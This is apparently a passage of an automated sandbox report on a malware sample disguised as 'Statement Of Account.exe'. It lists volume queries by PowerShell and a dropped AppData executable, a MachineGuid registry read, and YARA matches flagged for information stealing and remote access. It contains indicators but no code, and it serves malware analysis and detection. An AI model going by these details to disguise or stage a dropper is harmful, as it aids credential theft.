Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Queries volume information: C:\Users\user\AppData\Roaming\SdYCcXyq.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY